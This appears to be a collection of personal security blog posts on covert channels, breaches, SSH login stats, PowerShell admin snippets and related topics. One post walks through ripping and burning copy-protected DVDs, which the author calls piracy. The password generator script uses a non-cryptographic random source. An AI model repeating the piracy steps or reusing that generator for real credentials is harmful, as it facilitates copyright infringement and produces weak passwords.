Typically at home I have this stack of papers and junk printed out that I want to flip through and read. Kinda like bookmarking something later, only in the analog world. Lately, I happen to hit a glut of papers talking about covert channels (I'll link one or two if I still happen to have them around), which are always fun to look at. I then see the focus on ids list has a current discussion on detecting covert channels (really detecting encrypted channels which, as Ron Gula recently contributed, are a separate issue).

Covert channels are fun. They can be an easy way to break something, or use something for a purpose not intended by the creators. The old school version of "hacking" (which I subscribe to) tends to love this definition. They are also difficult and technical in some cases, thus I really believe that unless a firewall or proxy incidentally is blocking the channel, no one really blocks or watches these channels. If I ever get my home network more rounded out and the major projects done, playing with covert channels is something I'd love to tinker with. (And if I would do it, so would lots of other bored kiddies on the Help Desks at their jobs!)

[As an aside, I pick on the poor kiddies on the Help Desk or Tech Support or Customer Service desks a lot. I do so for good reason, though. Typically they can hold some very technically savvy people who have some level of access above normal users. They tend to not be in heavily taxing jobs and sometimes have "leisure" time at work to do some odd things. And let's not even think about those overnighters with even more time on their hands... Really, it's not that I distrust them, but I remember my days down there and what I would get my fingers into, and I know it happens.]

For instance, you can stuff information into a few non-used or little-used sections of ICMP packets and shoot them out to your target. But if a company is stopping all ICMP, that incidentally stops that particular covert channel. Someone can siphon away information using DNS, but if you only allow DNS traffic to servers you control...

Stopping (or using to your benefit) covert channels is much more difficult since it requires some pretty specific knowledge of TCP/IP and perhaps packet structure and creation. This probably makes the risk of someone leveraging this attack much smaller, which also may mean it is just not worth spending time combating for many companies.

But lets say you want to detect and/or stop covert channels? I won't get into specifics since I've not done this myself, but here are some approaches I would take.

First, make sure a solid egress configuration on border firewalls are present. If this isn't done, really, any other steps are simply academic and not going to add any security or sense of security. If you're not stopping arbitrary ports from connecting to other arbitrary ports on the Internet... Likewise, there is no reason to tackle ICMP covert channel detection if ICMP is blocked anyway.

Second, you need to be monitoring for anomalous traffic. A sudden spike in ICMP or other weird traffic that is not normal could indicate a covert channel in use. Again, the chances are slim, but any network monitoring strategy should already be tracking anomalous traffic loads anyway. You might also want to detect for regular traffic patterns such as an HTTP request that occurs exactly every 3 seconds for hours, or something to that effect. You might see more false positives with things like Weatherbug or Firefox doing regular checks or IM keepalives, but if your company is tackling covert channels, likely they have stringent software and IP rules in place already to limit such noise.

Third, make sure packets are inspected for erroneous settings and flags. Kinda like no TCP packet has any business having both SYN and RST (I think) flags set, there is just some information that, if present, should be investigated.

Fourth, proxy all web traffic in a way that the proxy rebuilds the packets. This should take care of really funky HTTP covert channels and also allow you more logging on what is likely the busiest and least securable port on your network.

Lastly, I really don't know what to do about steganography or hiding data inside other application layer data. I guess we have to hope that packet inspection firewalls eventually detect the normal tools and their signature/patterns, but I really wouldn't book my paycheck on that. Image-based stego is still a technical skill, but the tools have gotten far easier to implement and there are tons of locations on the webs to drop images for offsite pick-up.

Speaking of covert channels, I can't find the actual story, but I swear the Security Monkey had a post one time (I think a reader-submitted story) about someone hiding porn images inside a normal movie file, where a porn image would be one frame somewhere that could be extracted. Screen grab of sensitive docs instead?

Copying DVDs has become amazingly easy. I picked up a Samsung DVD burner from NewEgg for $33. They forgot the software, so I had them mail that separately, which is well worth it since it is Nero and includes not only the burning utilities but also the parts to leverage the Lightscribe labels.

I installed DVD Decrypter (pretty much optional) and DVD Shrink (find them on your own, but I suggest doom9.org as a first try). I use DVD Decrytper to rip DVDs to my hard disk, and then I use DVD Shrink to remove a few unnecessary things, like foreign language audio tracks, and also to burn since it can shuttle the project off to either DVD Decrypter (which can burn) or Nero itself. That's it! I ran a test copy of Fast and the Furious which happens to be a dual layer DVD. The ripping portion took about 15 minutes, I think, and DVD Shrink worked on the contents (about 4.5 GB on disk) for about 30 minutes. I removed two audio tracks. It then went right over and burned in about 5 minutes or so to a non-dual layer DVD.

With Nero, I was able to create a Lightscribe label in about 5 minutes and burn it on in about 15 minutes. I just did a quick Google Image search for Fast and the Furious images, picked the first one (which happened to be huge), plopped it on without resizing or playing with the brightness, and let it loose. The label isn't breathtaking or drop-dead gorgeous. It really just looks like a badly washed out greyscale image, but the quality (if you look closely) seems pretty nice. I'll likely use it rather than markers, and I likely will still use actual images as opposed to bland text in text boxes. I'm not really doing anything professional, just makin' copies!

All told, that was only about an hour of time and only about 10 minutes of actual work. Since I do this on my gaming machine, it gets to dedicate its time to this task when I'm not gaming (and holy crap does the processing of DVD Shrink drop to a trickle when I fire up WoW!). I keep that system pretty slimmed down, so that 1 hour is not a bad deal really.

Blank DVDs with Lightscribe will run me about $1 per disc. Dual layer guys will be about $1.5-2 per disc. At least that was my 2 seconds estimation while standing at Best Buy. That's still not bad at all as I estimate my typical DVD purchase is $14, give or take. This is why DVD ~~copying~~ pirating is still worthwhile, I guess!

Cutaway (possibly the only other guy on the Catalyst forums who gets away with using his screename!) had a really cool post that I wanted to save here. The part that caught me eye:

I think that the work Ed Skoudis, HD Moore, David Maynor, and other security researchers are doing help us identify products whose solutions have inherent, accidental, or misguided problems so that we can protect ourselves. But, unfortunately, their work does not instill the uninformed upper management with confidence in the security field. Actually, it probably has them all cussing under their breath. Of course this is where the security professional should be earning their keep by providing a buffer between the constant barrage of seemingly negative information and the actual state of the organization’s environment.

I am seeing there are numerous roles forming in IT and security. First, you have your IT geeks who actually do stuff (researchers or implementers). You have your business managers who keep an open mind about business and security (CSO/CIO). You have your trainers who deal with people. And you have your liaisons between those groups. I think those liaisons are the newest group and the subject of recent focus on "being more business knowledgable" topics.

C-levels don't like this news, but let's all face it. Security is never going to be perfect. The best illustration is to look at the security of those C-levels' homes. Are they foolproof? No. Do they make mistakes like leave windows or doors open even if they're not home? Yes. Just like everyone else. And if they do have an alarm system, does that preclude their relatives or the security installers from being able to circumvent it should they be determined to do so? Or thieves to just barge in regardless of the alarm claxons? Security is not something you can achieve and forget about. It is ongoing and risk management.

Business hates hearing that because too often they take the very human approach and think, "Gosh, why bother spending money on this junk?"

That's where I think the liaisons come in. Just like Cutaway says, they buffer most of that negativity, but I believe they also try their best, along with the trainers, to make sure everyone knows security is not like a light switch; either on or off.

Alice over at the Vulnerable Minds blog reminds that the DefCon CTF quals are going on this weekend. Here are sample solutions for last year's pre-quals. I may just check to see if that Mud is open to all...

I only skimmed this article (mostly because of where it came from), but I really caught this line:

No one has a business interest in catching identity thieves or malware writers. There's no money in it, so no-one's bothered.

I would also add, while some of us would help and/or deal with threats, we just can't or don't have that authority. Bejtlich is one of the notables who talks about dealing with the threats instead of vulnerabilities. He makes a ton of sense and I agree with him, in theory, I just don't think most of us have any opportunity to deal with the threats beyond identifying them with guesses.

A while back, Rybolov (Guerilla CISO himself!) posted a link to Heidi, Geek Girl Detective. I finally got time to finish through the story over a latte this weekend and was quite entertained! Must be something about Seattle to have geeky comics (PennyArcade being a notable one)...or maybe the town is more creative than most...maybe it's the rain. And for the record, I read the Hardy Boys and Encyclopedia Brown as a kid, not Nancy Drew.

This past week I began the motions of signing up for a new gym, for a change of pace as summer feels like it has started. So I signed up on the gym's (franchise) website and all that jazz. About a day later I get an email from a residential email address saying that my info is being forwarded somewhere and to expect a call back. This email was then sent to another residential address down in texas. And of course, my credit and personal details are in the email, nicely fomatted with HTML tags.

Really, there are still many businesses and people who have no idea how insecure digital methods can be. But even if they do, many of them have no idea what to do about it without spending money to get someone to do it for them, or devote time out of their own life to do it.

If I am happy about nothing else, at least I was able to see that my info was passed over email. This way I won't be chasing my tail should that card end up with fraudulent charges in the near future...I'll have an obvious place to begin.

RSnake and also Andy linked to File-Swap with wonderment in their eyes. More like confounded amazement really. But come on, this site is awesome! It is the modern equivalent to russian roulette! Take a spin! Really, how secure in your systems do ya feel, punk?

Now, I have this thing about user-supplied content and Web 2.0. I've been around long enough to see the days where Rotten and EbaumsWorld have spawned up to house all kinds of disgusting junk before dot-coms even thought of busting. Sadly, this file swap is just as ripe for disgusting content as it is malware content. Maybe more so since the former is far easier to achieve than the latter. Then again, use Metasploit to generate some malicious images...? Either way, some ideas may be cool to generate some "wtf," traffic hits, but a site like this simply cannot have longevity and remain relatively clean.

A quick excerpt from a CIO article. Without details, it is tough to separate fantasy (or simply blind speculation) from reality, but I think this story may just ring true. The article is focused on how difficult forensics is becoming as criminals employ more antiforensics tactics. Personally, I don't think it has gotten any worse to track down criminals over the wires, there is just more money involved these days. (On-disk forensics notwithstanding.) (Update:I see more discussion here from keydet89!)

A clear illustration of this fact comes from the field investigations manager for a major credit services company. Sometime last year, he noticed a clutch of fraudulent purchases on cards that all traced back to the same aquarium. He learned quite a bit through forensics. He learned, for example, that an aquarium employee had downloaded an audio file while eating a sandwich on her lunch break. He learned that when she played the song, a rootkit hidden inside the song installed itself on her computer. That rootkit allowed the hacker who’d planted it to establish a secure tunnel so he could work undetected and “get root”—administrator’s access to the aquarium network.

Sounds like a successful investigation. But the investigator was underwhelmed by the results. Why? Because he hadn’t caught the perpetrator and he knew he never would. What’s worse, that lunch break with the sandwich and the song download had occurred some time before he got there. In fact, the hacker had captured every card transaction at the aquarium for two years.

As a side rant, I really hate how a not-large article turns into 10 page "turns" on news sites these days. I mean, come on, everyone can see through this little "click more to serve more ads" scheme. It actually conditions me to look for the Print icon to view the printable version that, amazingly, has no ads and displays on one page.

Random link from Full-Disclosure: mlabs.secniche.org

I hate to post more rants than useful content on here, but this week has been too busy for much more than ranting. I saw an article about the dangers of unauthorized teleworkers, that is, those workers who bring work home with them and possibly work on their home computers.

The report found that 63 percent of respondents who worked from home unauthorized -- more half of the non-teleworkers surveyed -- used their home computers in doing that work. "People were saving documents on their home computers that were unprotected," said Josh Wolfe of Utimaco, a data security company that underwrote the study.

...

"We're not sure if these people are dealing with spreadsheets with Social Security numbers on them or something more mundane than that," Wolfe said.

I like security, and I like to think I have a (healthy) paranoid/security-conscious mind, but I really believe we can go too far very easily. While government employees maybe shouldn't take work home with them (and yes, I pointed out that second blurb to show that maybe all those workers had non-sensitive materials and were working on presentations or some junk), I hate when articles like this make their way to other circles and present things without proper context (I expect to see this study referenced in non-government articles soon...). Take a small start-up company. Yes, those people likely take work home with them, it happens, it is natural, and at some point every single one of us does it.

Yes, we have to be conscious of our data leaving the confines of our happy networks, but we can't obstruct our users trying to make the business successful. That's one of the (few) issues I have with data-centric security. Trying to secure the data eventually impacts the success of the business and the happiness of the people.

One other note I had from the article is about how data-centric security really only works when you can classify your data and separate the sensitive or confidential stuff out. Data-centrism is great for that classification and for being conscious of the security of your really sensitive data, but it breaks down and is ineffective and inefficient for the rest of the data. It can also be theoretically effective when you just declare "all information is sensitive so let's encrypt everything!" But that gets into a realm that is just not really going to be possible yet, at least at the level of near-perfection that statement alludes to while allowing employees to do their work and be an asset.

Maybe this is just the media being way too sensational about digital security still. We don't see dramatic reports about how people's homes are insecure because, while we have a deadbolt in front and back, our windows can be smashed, oh my. Security isn't perfect and never will be, and I'll continue to bristle when media or persons have an underlying tone that anything less than perfection is inadequate. Maybe our industry does get it, but damn if the media still stirs us up and gets our blood going still.

Maybe I should further limit my chosen media outlets away from journalists...hehe! Hell, I've been tracking the front page daily headlines on cnn.com and it reads more like a tabloid or YouTube front page than anything anymore...

F-Secure (and Andy, whose blog I checked first!) posted about the most common registry locations that malware tries to start from on Windows. Not only is this list highly useful to check in response to an incident, but like any good baseline, this is a list of locations that all admins should be familiar with even before an incident. It doesn't help to have an incident, check one of these locations, and not know what those other 25 entries do. That is wasted time trying to isolate which one is out of place. Check these locations out now and see what is really going on with your system. I even filed this into my always-being-built wiki.

George Ou has recently taken up the torch of demystifying RAID for average users so they can reap the benefits. Unfortunately for George, I agree with his detractors that say RAID isn't going to fly in the home. Honestly, RAID makes even geek heads spin sometimes, including my own, and managing one's RAID setup is really up there with changing your own oil: not everyone does it or wants to do it. In fact, most average people really couldn't give a fuck about RAID; they just want to backup their data.

I think George should stick to the easy things when it comes to consumer-level storage. Educate people about regular backups using one of two methods: drag-n-drop or NT Backup (or both!). And for media, educate people to use one of four options: external hard disk, USB key (or two), cd burning, or dvd burning. Drag-n-dropping data is natural, and people just have to think about what they would want backed up, drag it over (or burn it), and set it aside in a safe place. If people don't understand or know what they all need, use NT Backup and in the event of a disaster (on consumer levels, i.e. a hard disk gone bad) have that on hand for techies to restore.

That really should be the extent of trying to educate the masses. Granted, it is not pretty or scalable, but it gets the job done and goes only as far as most consumers really care to go. (Honestly, I'm not sure who George's audience is, technically proficient people who already know this stuff or technically inproficient people who shouldn't be bothered with RAID...either way, he's seeming a bit lost on this effort.)

Unless you're like Marcin and aren't aware of your surroundings for weeks at a time (hehe!), you likely know about that guy who has a strain of Tuberculosis and decided to fly halfway around the world and then purposely circumvent security to come back to the US. If someone has seen that this winner of a guy has ever posted or spoken an actual apology yet, please let me know. I've yet to see one, and seeing one would assuage my anger...

To bring this back a bit, do you know who the cowboys in your organization are who know security but choose to circumvent it and take big gambles with people's welfares? Do they ever apologize? Do they ever reform?

This weekend I finally (after way too long) got my OpenVPN setup to work as desired. I had plenty of workarounds ready, but I was pretty determined to get this working the way I wanted. I think my problem was twofold. First, I needed to turn on ipv4 forwarding on the Ubuntu OpenVPN server. I will be testing this today to see if that really was needed. Second, the Linksys WRT54G route was set up wrong. Not sure what I was thinking, but I corrected the problem this weekend and everything was happy. So I blew away the server VM and rebuilt it without all my little troubleshooting settings and commands to better isolate only exactly what I need to rebuild the system. I'll provide more details on my install hopefully later this week. After a few more builds, I expect to save a post-install snapshot finally.

I have not been made aware of being a victim (or potential victim) in any of the large-scale data breaches so far (I don't shop at Marshals/TJX and I only use one credit card for the most part anyway...I still like cash the most!), but I know someday I will. A little closer to home, I see this morning that "more than a thousand" people have been notified about a data breach at the University of Iowa. Why this breach only exposed "more than a thousand" people, I'm not sure. All the other tired prerequisite PR notes are given such as "No evidence that personal information is being misused...". I have no evidence that I might be involved in a car accident today, but that won't stop it from possibly happening.

While this is closer to home, I will note I graduated from Iowa State University, not U of I.

This morning I decided to replace part of a script I own at work with a random password generation function. This was easier than I thought it would be. This function takes a number that should be greater than 4, and returns back a random password of that length. The character sets are pretty obvious inside the function and can be adjusted as needed. The password generated assures the first 4 positions will always be a number, capital letter, lower case letter, and symbol, respectively, to meet some complexity requirements. The rest of the positions are a random character chosen from a random character set.

function RandomPassword ([int]$intPasswordLength)
{
   if ($intPasswordLength -lt 4) {return "password cannot be <4 chars"}
   	
   $strNumbers = "1234567890"
   $strCapitalLetters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
   $strLowerLetters = "abcdefghijklmnopqrstuvwxyz"
   $strSymbols = "!%^&*()+=/?{}[]~,.<>:"
   $rand = new-object random

   for ($a=1; $a -le $intPasswordLength; $a++)
      {
         if ($a -gt 4)
           {
      	      $b = $rand.next(0,4) + $a
      	      $b = $b % 4 + 1
      	   } else { $b = $a }
      	 switch ($b)
      	   {
      	      "1" {$b = "$strNumbers"}
      	      "2" {$b = "$strCapitalLetters"}
      	      "3" {$b = "$strLowerLetters"}
      	      "4" {$b = "$strSymbols"}
      	   }
         $charset = $($b)
         $number = $rand.next(0,$charset.Length)
         $RandomPassword += $charset[$number]
      }
   return $RandomPassword
}
RandomPassword 36

No doubt there are other functions and solutions to this, but I kinda just wanted my own.

Couple quotes I like. Andy already mentioned one, but I thought I would mention it again along with the previous days' quote on our Art of War calendar.

"When your strategy is deep and far-reaching, then what you gain by your calculations is much, so you can win before you even fight. When your strategic thinking is shallow and near-sighted, then what you gain by your calculations is little, so you lose before you do battle." The Art of War, Chapter 1 On Assessments

And...

"When the army is old, the soldiers are lazy, and the discipline and command are not unified, this is an opponent that has already lost." The Art of War, Chapter 4 Formation

I've been doing more scripting lately, and thought I should document (for myself) some of the stuff I've been using. Rather than spit them out here, I put them on the wiki. Here are some snippets of what I use. We use these scripts when building new development environments and servers. Nothing ground-breaking, but still useful as inspiration if anyone else is working around PowerShell.

Create Windows services
Building LDAP container and object strings
Process and create OUs
Create an Active Directory Group
Create an Active Directory User
Open and search XML files

I've had an SSH server up for some time on the default port 22 tcp on a Windows box. The other day I finally moved it over to a virtual Ubuntu box where it will stay indefinitely. While SSH was running on Windows, I logged all failed attempts. I didn't expect Amsterdam to outpace Asia! Also, I suspect these were all automated attempts since root was tried the most. Using Cygwin on Windows, I don't have a "root" account. In fact, "Administrator" was never even attempted once (what the hell?). Go figure.

This brings me back to a recent thread on the Security-Basics list hosted at SecurityFocus where a lot of people got pretty heated up about whether changing the default SSH port or using port knocking is an effective security measure. There were impassioned responses on both sides of the equation, and in a way, they were all somewhat correct. But I think it is more accurate to say changing the SSH default port is not a security enhancement, technically, but does reduce the risk of that service. Risk is decreased, and in a more high-level way of defining "security," the security of the box was increased. This does not mean SSH became more secure or the box magically became more secure... Really, it just came down to semantics (mostly).

The stats above help illustrate that risk my SSH server faces. If the SSH port had been moved, I would honestly be surprised if I had a dozen failed login attempts. That illustrates reduced risk. I'd also be able to identify my threats a little better. Someone with 5 failed attempts on my obfuscated SSH port may indicate a targeted attacker as opposed to an automated worm scanning for SSH. If someone was able to port knock my SSH open to make failed attempts, that might perhaps indicate my port knock sequence was sniffed somewhere or an insider is atetmpting something fishy.

I'll always say I like lists. C-levels like lists, average people like lists, techies need to like lists. :) Over at ZDNetAsia, Scott Montgomery, global vice president for product management at Secure Computing, gave his take on 4 damaging security habits in the corporate world. Here are my responses/takes. Overall, I like this succinct list, and with minor quibbles, it's a good list.

1. Fixed Passwords - Fixed passwords, in my mind, are adequate. They aren't the best practice and best thing to use, but they are still by far the most economical for most corporations and people. We know passwords, we're used to them, and they tend to be just fine when properly complex and rotated. If one-time passwords were so useful, why are they so difficult to roll out or scale up to our needs? They are because you need a lot of levers and gears aligned in a corporate environment to be able to effectively implement such solutions. No single-sign-on possibility in your shop? Then one-time password tokens are not yet for you.

2. Neglecting inbound threats from e-mail, the Web and instant messaging - Montgomery gets this one correct, and not much I can add to it other than nitpicking about the term "threat" used for an attack vector.

3. Forgetting that data traffic is two-way - I think this is another good point, although I think we can all admit trying to get our arms around egress is like trying to hold down a very large bear or herd cats. I think that is a major reason so many of us are behind here: we have other easier things to tackle. But certainly, we should keep this in mind. But always think about this: how do you stop me from uploading data to a web server that I own? How do you stop me from uploading data through an encrypted channel on port 80 outbound? These are difficult to stop in many shops, without spending some good money on solutions. Hence...they do get left behind.

4. Not encrypting data - I don't like bashing lack of encryption by using email as an example. Sadly, SMTP is broken and obsolete, but like the SSN, it is so widely used and relied upon... He also dives very deeply into the FUD by saying unencrypted mail is public like a paper. No, it's not, but he still brings up a good point. Encryption should be used whenever possible on the wire, and on the disk. We'll only slowly move in this direction due to compatibility issues.

Another interesting list, this one on 10 reasons why the Black Hats have us outgunned. I won't hit every point, but here are a few things I want to add.

Becoming a Black Hat is a career option even for those who are not super geeks. Very true, and we can see this in the news reports of the people who get caught. They tend to be on the fringe of being a geek, really, especially the stupid spammers. They don't strike me as particularly skilled at anything beyond their one opportunity and a few tools (hence maybe why they get caught!).

Not all businessmen are entirely averse to the odd hack (on a competitor) I truly wonder exactly how many executives and "high-powered" business persons have a true level of morality. I doubt many do. I expect many have fudged numbers, told white lies, and done some less-than-ethical leveraging and information gathering. When you have money and power at your disposal and you need to protect both, I think a lot of people slide down a rather immoral slope very quickly. If I were a multi-billion-dollar company in a major city with interests to protect, would it be much skin off my teeth to hire someone to sit at the airports all day and "probe" the wireless travelers? Or maybe at my competitor's airport? I still expect this "career option" to grow, whether I agree with it or not.

As I've been doing a heck of a lot of PowerShell scripting the past few weeks at work, I've come to re-appreciate the comfort of being able to work in a very bounded environment. Network/Systems/Security work is pretty damned unbounded, but when you work on a programming or scripting language, you don't have to necessarily sweat the scope or mechanics because they're created for you, for the most part. You deal with the basics, loops, variables, moving data around, manipulating data, reading and writing to objects, and so on. It's like putting together a jigsaw puzzle; there's something comforting in the ability to focus. Plus the immediate response/results of scripting are really nice.

I stayed away from scripting, and more appropriately, programming when I was in college and just out of college because I didn't want to find myself being a kickass XYZ programmer and only a kickass XYZ programmer while languages A, B, and C flew by. Maybe in another life or a future career opportunity will open up a more dedicated scripting/web dev job opp. I think I could live with that, honestly. I think it would have to be a smaller company, though, rather than just being the builder of Function A in Large, Slow, Non-Creative Company.

Maybe that's why every couple years I perform some deep rework on my web pages, or have an affinity towards scripting. Once you know the mechanics and syntax and keywords of a language, it is all downhill from there (at least for me, since the logic comes easy to me). Braindump Ruby on Rails into my head, and I could probably have a lot of fun with that language, as much as Neo with Kung-Fu.

Anyway, my PowerShell snippet today involves deleting services. Creating services is pretty easy in PS, but deleting them was left behind for WMI to pick up. And no reboot is required. (Unless you have a service open at the time you attempt to delete it, in which case Windows will hang on that and hold the service for deletion until you reboot...so make sure you're not working in the service anywhere before you try to trash it.)

$service = gwmi win32_service | ? {$_.name -match "ServiceName"}
$service.delete()

Since this is short, I tend to do this manually, and I try to always make sure $service returns the proper service by calling it once just before the delete. And you do this to remote computers by adding "-computer 'computername'" before the pipe (and with double quotes instead of my grammatically correct singles).

The Swear Jar (work safe) (heard this in the office and also from FurryGoat). Seriously, if you can't have this bit of fun in your office at some point, I wouldn't want to work there. People don't do great things by being in an oppressive or unfun environment. Hell, people just aren't optimally productive in such environments. (Ok, minus the lobby area announcement, hehe.)

There's a bunch of different ways to play with the registry in PowerShell. My latest script snippet that I wanted to preserve on here deals with a couple ways to add registry keys and values. For as cool as this is, however, I don't believe PowerShell is able to make such changes to remote registries without using other methods. When in doubt, I guess I could just Invoke-Expression psexec.exe someregfile.reg and have it done there, but hopefully PowerShell gets remote registry scripting ability eventually, as this would be the next way to script mass registry changes to people beyond Group Policy.

Anyone know anyone at Google or in the Omaha area with any ties to Google's expansion to Council Bluffs? That's not really a place I care to live (I'm originally from Sioux City about 90 miles up the river although I live in Des Moines now), but a stint at Google? That'd potentially be pretty sweet. And really, the Omaha/Council Bluffs pair is not a bad place at all.

Dan Morrill pointed over to ComputerWorld's annual best places to work survey. I clicked the list of 100 companies expecting to see ComputerWorld advertisers, the same old big guns like Google and Microsoft and Yahoo!, and others large companies that can have lots of day-to-day IT grunts write in praises on the surveys (seriously, there are tons of little surveys on Best Company for ____ that are simply getting 80 of your own employees to write in and overwhelm the voting...), but, I was pleasantly surprised to continuously say, "who? who are they? huh?" to many entries. This intrigues me a lot, and makes me kinda wonder what some of these smaller, unexpected entrants do with their IT operations and workforce to be such good places to work. Almost anyone should be able to take the top 20 in this list and get good material from them for case studies... Any by "smaller" I mean smaller than the biggest companies that I expected.

I really think there are many, many smaller and start-up type companies that are amazing places to work for, especially if they have predictable income (which sometimes is tough because so many want to be Yahoo rather than a long-term small company that maintains a solid existence without trying to eat the whole cake...). Hrm, yes, I still have a bug to find something better...

If you didn't think auditing and security was going to be a growing field, add this to the reasons you should stop being naive. ComputerWorld posted a series of questions and requests reportedly made by HHS to Piedmont Hospital as part of a (surprise?) HIPAA audit. Keep in mind that it seems Piedmont only had 10 days to submit the answers. That basically means having it all done and ready, not trying to slap it together during a couple 120 hour weeks. (And even if they did that, any even minor interview with IT techs will reveal the wide-eyes and confusion about the superficiality of anything slapped together.)

Likewise, if these questions don't make you gulp at least a dozen times, you might be living in a dream world. Lots of people talk about security enabling business and ROI and things like that, but there is still going to be a growing field of people just taking care of the back rooms, because these things simply cannot be tacked onto "enabling" projects or expensed properly by a project or business initiative.

I am also very confident that these questions en masse cannot and never will be answered or tracked by any one product no matter how unified it is. Technology changes too quickly and there is too much of it. By the time products dig in and solve something like Windows 2000, then Windows XP is released. And then Vista. And then wireless. And then new attack vectors arise like wireless driver attacks, plus "arguable" attacks like DRM-justified rootkits. And then businesses that simply have to retool their infrastructure every 4-5 years, plus all the homegrown glue that holds everything together. And the changing landscape of almost every business. And the fact that while each company only has a handful of problems when it comes to IT, there are unlimited solutions free and commercial... Oh man, headache...!

A product can never do all this, nor can a CSO/CISO alone. There will continue to be backroom people, unless we want to just do security on a superficial surface level or make our networks much more homogenous such that Company A's setup is almost exactly the same as Company B's setup. No product can do that, although you can argue that service providers may have a chance...but no service provider will be able to scale up to provide for every company even in their own city, let alone make a dent on larger companies or on a wider scale.

I know I'm slightly keeping Rothman in mind when I say the back room is not going away, but I firmly believe all of this just goes back to being as pragmatic as possible when managing security. I still need to get my hands on his book... :)

Update: I know that these questions may be no different than people are being treated to with SOX and HIPAA, but still, how many have really been able to take either of those 100% seriously and adhere to them? Like PCI, it's all about the teeth...maybe cyberinsurance will add the teeth, I dunno. But I would amateurishly estimate that 98% of all businesses would have major infractions from any audit performed, PCI, SOX, or HIPAA.

There is talk about the iPhone's implications to security. I think it is important that anyone discussing this make it clear where their perspective lies: from the eyes of an autonomous home consumer or the eyes of corporate IT. From the eyes of a home user, my condolences, but I really expect this device to be no different than any other, and likely exploitable. For the business perspective, this is no different from any other phone or USB key fob on the market.

1. Limit/disable USB/Bluetooth ports on your laptops and desktops.
2. Only officially support the use of approved devices, of which there should be few, and they should be manageable from something like a BES server.
3. Make sure you know what MACs are on your network, and if an iPhone is able to get onto your Ethernet network, be sure you have alarms and possibly port security on your network.
4. (Optionally) Disallow, by policy, the use of home phone devices to transmit corporate email to and from. You might not be able to effectively audit this, but you better let people know they shouldn't be doing it in the event you find out they are.

If you don't already do the above corporate security measures, you have no business worrying about the iPhone. If you already do the above corporate business measures, you have no business worrying about the iPhone beyond deciding how long to wait before allowing it as an approved device for syncing and official use (or when to put the final "PERMA-DENIED" stamp down.

Workplace geek humor time! One of those sounds that just always makes me grin in eerie pleasure when sitting in my cubicle is the sound of print job white noise unceremoniously turning into a printer quietly eating the paper. Not just printing, but jamming up and eating the paper; the pleasant crinkling that indicates things are not well...sure to give me a grin!

Bonus points if someone walks over in the next 15 minutes and starts swearing softly and sounding like they're banging every lid tray and movable plastic piece on the printer...that sadistic side of geek humor, that!

Mr. Buddha, Mark Curphey, mentioned dashboards recently, which got me all giddy at the link he provided to a site about information dashboards. I love me some dashboards. I love them enough that I have a section of my menu on the right devoted to security dashboards. Dashboards are used to distill relevant information down to a, hopefully, more visual representation of your reality. Not only that, but have you ever had someone in the management chain above you go gaa-gaa over the pretty pictures and lights and trends on your desk, even when they have no friggen clue what it all means? People seem to react positively to seeing things like this on a network or security admin's desk. At a previous job, I didn't get too many people walking by wondering what I had up my sleeve for that day, but whenever I turned on a dashboard, I had plenty of people from various job roles wander over and ask what all the lights and colors were for and how "cool" it was. In my mind, it has become part of selling oneself as a technical and security expert.

Now, I want dashbaords at home, someday. I don't know if I will ever become proficient enough to roll my own, but I have plenty of spare systems and monitors around to utilize their extra cycles to display neat metrics and dashboards. Due to my current refusal to "settle," I don't have big furniture in my apartment like a desk or two, so the whole dashboard setup needs to wait a bit more.

But I thought it worthwhile to write down, for myself, a bit of a wishlist on dashboards I'd like to see on my desk over time. Note that this is at home, although many of these things should be able to scale up to enterprise use. Suggestions for tools are welcome.

visual traffic monitoring - like etherape or eve or plenty other tools that give a pretty view of what and where traffic is on the network.
less visual traffic monitoring - like a tcpdump scrolling by on a monitor; only tailored down to watch only things really important (and not my workstation streaming web radio...)
traffic summary - a summary of traffic levels to web, mail, VPN, SSH servers and so on; even as pared down as simple daily log file sizing.
system monitoring - on a basic level, what is up and what is currently down. On a deeper level, system health such as CPU, RAM, and disk usage, running processes, and so on.
service monitoring - on an even deeper level, any time traffic to something comes in it can log, throw a visual cue, or send a quick message, for instance a login attempt on SSH or VPN.
arp watching - roll your own basic NAC rogue detection on a network by monitoring arp requests in a DHCP network, using arpwatch or arpalert (I think those are the names).
security monitoring - tripwire-like integrity detection on important systems, account creation events
IDS - things like Snort alerts, although these aren't as useful on a dashboard, per se.
threat/vulnerability/external - It is nice to monitor one's own realms, but none of us are islands. We need to know about changing threats, new vulnerabilities, or maybe some trend or new attack vector affecting the security health of the Internet as a whole. There are plenty of these sorts of dashboards available, since they lend themselves well to the web.
wireless - kismet just to keep an eye open for new clients and the wireless network in the area
wireless spectrum analyzer - run the pretty Wi-Spy tool in a corner to monitor the health of the wireless frequency range.

Ok, so all of this is pretty personal to me, because I am a firm believer in keeping one's fingers not just in the trenches of the back room, but making sure they are constantly feeling for a pulse, temperature, clamminess, etc. So much about security and IT in general has a fundamental base of monitoring for changes and abnormalities. It's the part of me that is a control/information freak which lends itself well to the field. And yes, I like having a few non-screensaver'd monitors around me showing me what is going on at all times.

By way of the SecuriTeam blog, I see Joe Stewart has posted a quick technical article about thwarting an HTTP DDoS attack using iptables tarpitting. I also like the cite to a report by Jordan Wiens [pdf] about tarpitting DDoS worms (I've not read it yet). I especially like the graph showing the effects of no action, connection dropping, and tarpitting. As a question to myself, I wonder if the attacked system needs to keep track of those sessions as well, and if that might bleed the server a bit over time? Obviously, this is still better than having the server fall over in the first 5 minutes, while tarpitting likely can allow the server to hold out far longer, even if it still bleeds.

One thing that Joe leaves unspoken is tarpitting is not to be used for all HTTP requests. Some of those requests are legitimate users and you certainly don't want to tarpit them. Tarpitting should be triggered after a connection is determined to be part of the DDoS, so there is some front-end work to be done. I expect Wiens covers this in the longer paper.

A smooth sea never made a skillful mariner. -English proverb

Via elamb, The Register has an article on hacking World of Warcraft, and also mentions an upcoming book I didn't know about, Exploiting Online Games: Cheating Massively Distributed Systems, by Gary McGraw and Greg Hoglund.

Exploiting games like this, as I'm sure the authors posit, is something that might not interest a lot of people, but should still be watched. Things like WoW (12 million users! This has become a social network in itself, really!) and Second Life bleed over into the real world, both in relationships with fellow people and business realms. But beyond that, the distributed worlds of gaming on such a large level will, just like the hardware gaming pushes, eventually find more mainstream uses. Being able to know these risks (like offloading some of the work to the client machines), at least just being aware of them, should prove useful someday.

I'll get this book regardless, since I play WoW [0] and I've seen things in past games that exemplify the issues with cheating [1]. It helps a lot to know what is possible out there, and can put the whole gaming world/experience into more of a perspective. The book also looks like it will explore the issues that the game software presents to the users, for instance how far the game software can go in monitoring the user. Thankfully I run gaming on a separate box which does nothing but burn discs and run games, but I'm a rarity in that setup.

